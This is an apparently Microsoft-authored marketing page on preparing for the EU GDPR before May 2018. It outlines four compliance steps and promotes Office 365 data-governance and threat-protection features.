Given how much is involved, you should not wait until the regulation takes effect in May 2018 to prepare. You need to begin reviewing your privacy and data management practices now. Failure to comply with the GDPR could prove costly, as companies that do not meet the requirements and obligations could face substantial fines and reputational harm.

We recommend you begin your journey to compliance with the GDPR by focusing on four key steps:

  1. Discover: Identify what personal data you have and where it resides.
  2. Manage: Govern how personal data is used and accessed.
  3. Protect: Establish security controls to prevent, detect, and respond to vulnerabilities and data breaches.
  4. Report: Keep required documentation, and continuously review and update your data protection policies and practices.

Microsoft products and services provide powerful solutions to tackle these steps in your journey to compliance with the GDPR.

To learn more about how Microsoft products and services can help you prepare to comply with the GDPR, please see the sections on Azure, Dynamics 365, Enterprise Mobility + Security, Office 365, SQL Server/Azure SQL Database, and Windows 10.

Microsoft’s commitment to the GDPR

The goals of the GDPR are consistent with Microsoft’s long-standing commitment to security, privacy, and transparency.

We are working to bring our products and services into compliance with the GDPR by May 2018. We are updating the features and functionality in all of our services to meet the GDPR requirements, and we are updating our documentation and our customer agreements to reflect the GDPR requirements.

Microsoft offers the most comprehensive set of compliance capabilities of any cloud service provider. And, we lead the industry in engaging with customers, regulatory bodies, and standards boards to advance compliance and serve customers’ needs. We will remain closely engaged with you as we prepare together for the GDPR to go into effect.

Microsoft designed Office and Office 365 with industry-leading security measures and privacy policies to safeguard your data in the cloud, including the categories of personal data identified by the GDPR. Office and Office 365 can help you on your journey to reducing risks and achieving compliance with the GDPR.

One essential step to meeting the GDPR obligations is discovering and controlling what personal data you hold and where it resides. There are a number of Office 365 solutions that can help you identify or manage access to personal data:

  • Data Loss Prevention (DLP) in Office and Office 365 can identify over 80 common sensitive data types, including financial, medical, and personally identifiable information. In addition, DLP allows organizations to configure actions to be taken upon identification to protect sensitive information and prevent its accidental disclosure.
  • Advanced Data Governance uses intelligence and machine-assisted insights to help you find, classify, set policies on, and take action to manage the lifecycle of the data that is most important to your organization.
  • Office 365 eDiscovery search can be used to find text and metadata in content across your Office 365 assets—SharePoint Online, OneDrive for Business, Skype for Business Online, and Exchange Online. In addition, powered by machine learning technologies, Office 365 Advanced eDiscovery can help you identify documents that are relevant to a particular subject (for example, a compliance investigation) quickly and with better precision than traditional keyword searches or manual reviews of vast quantities of documents.
  • Customer Lockbox for Office 365 can help you meet compliance obligations for explicit data access authorization during service operations. When a Microsoft service engineer needs access to your data, access control is extended to you so that you can grant final approval for access. Actions taken are logged and accessible to you so that they can be audited.

Another core requirement of the GDPR is protecting personal data against security threats. Current Office 365 features that safeguard data and identify when a data breach occurs include:

  • Advanced Threat Protection in Exchange Online Protection helps protect your email against new, sophisticated malware attacks in real time. It also allows you to create policies that help prevent your users from accessing malicious attachments or malicious websites linked through email.
  • Threat Intelligence helps you proactively uncover and protect against advanced threats in Office 365. Deep insights into threats—provided by Microsoft’s global presence, the Intelligent Security Graph, and input from cyber threat hunters—help you quickly and effectively enable alerts, dynamic policies, and security solutions.
  • Advanced Security Management enables you to identify high-risk and abnormal usage, alerting you to potential breaches. In addition, it allows you to set up activity policies to track and respond to high-risk actions.
  • Finally, Office 365 audit logs allow you to monitor and track user and administrator activities across workloads in Office 365, which helps with early detection and investigation of security and compliance issues.

For more information please visit our Office 365 Trust Center.

To learn more about how Microsoft products and services can help you prepare to comply with the GDPR, please see the sections on Azure, Dynamics 365, Enterprise Mobility + Security, SQL Server/Azure SQL Database, and Windows 10.

For more detail visit the Microsoft Trust Center.